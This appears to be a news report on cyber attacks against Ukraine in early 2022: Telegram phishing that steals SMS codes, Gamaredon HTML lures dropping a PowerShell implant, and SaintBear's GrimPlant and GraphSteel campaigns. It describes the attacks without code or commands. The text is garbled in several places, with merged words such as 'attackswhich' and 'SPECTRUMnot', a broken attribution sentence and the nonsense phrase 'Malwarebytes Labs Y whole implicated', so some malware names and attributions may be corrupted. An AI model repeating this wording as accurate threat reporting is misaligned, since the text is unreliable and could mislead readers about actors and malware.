Ukraine’s intelligence and technical security service warns of a new wave of cyber attacks aimed at gaining access to users’ Telegram accounts.
“Criminals sent messages with malicious links to the Telegram website to gain unauthorized access to records, including the possibility of transferring a one-time code from SMS”, the State Service for Special Communication and Information Protection (SSSCIP ) from Ukraine. saying on an alert.
The attackswhich have been attributed to a threat group called “UAC-0094”, originate with Telegram messages alerting recipients that a login has been detected from a new device located in Russia and urging users to confirm their accounts by clicking on a link.
The URL, actually a phishing domain, prompts victims to enter their phone numbers as well as one-time passwords sent via SMS that attackers then use to take over accounts.
The modus operandi mirrors that of a previous phishing attack revealed in early March that took advantage of compromised inboxes belonging to different Indian entities to send phishing emails to Ukr.net users to hijack accounts.
In other social engineering campaign Observed by the Ukrainian Computer Emergency Response Team (CERT-UA), war-related email lures were sent to Ukrainian government agencies to deploy a piece of espionage malware.
The emails come with an attached HTML file (“War Criminals of the Russian Federation.htm”), which culminates in the download and execution of a PowerShell-based implant on the infected host.
CERT-UA attributed the attack to Armageddon, a Russia-based threat actor linked to the Federal Security Service (FSB) that has a history of targeting Ukrainian entities since at least 2013.
In February 2022, the hacking group was connected with espionage attacks targeting the government, the military, non-governmental organizations (NGOs), the judiciary, law enforcement, and non-profit organizations with the primary goal of exfiltrating confidential information.
Armageddon, also known by the nickname Gamaredon, is also believed to have identified Latvian government officials as part of a related phishing attack towards the end of March 2022, employing war-themed RAR files to deliver malware.
Other phishing campaigns documented by CERT-UA in recent weeks have deployed a variety of malware, including GraphSteel, GrimPlantHeaderTip, LoadEdge and SPECTRUMnot to mention a spearheaded ghostwriter operation to install the Cobalt Strike post-exploitation framework.
The GrimPlant and GraphSteel attacks, associated with a threat actor named UAC-0056 (also known as SaintBear, UNC2589, TA471), are believed to have started in early February 2022, according to SentinelOne, which described payloads as malicious binaries designed to perform reconnaissance, credential harvesting, and execute arbitrary commands.
It is also assessed that SaintBear was behind the WhisperGate activity in early January 2022 that impacted government agencies in Ukraine, and the actor prepared the infrastructure for the GrimPlant and GraphSteel campaign starting in December 2021.
In the past week, Malwarebytes Labs Y whole implicated the hacking team in a new series of attacks in late March targeting Ukrainian organizations, including a private TV channel called ICTV, via a phishing lure containing Excel documents embedded with macros, leading to the GrimPlant backdoor distribution (also known as elephant implant).
The disclosure comes as various advanced persistent threat (APT) groups from Iran, China, North Korea, and Russia have capitalized on the ongoing Russo-Ukrainian war as a pretext for backdoor victim networks and organizing other malicious activities.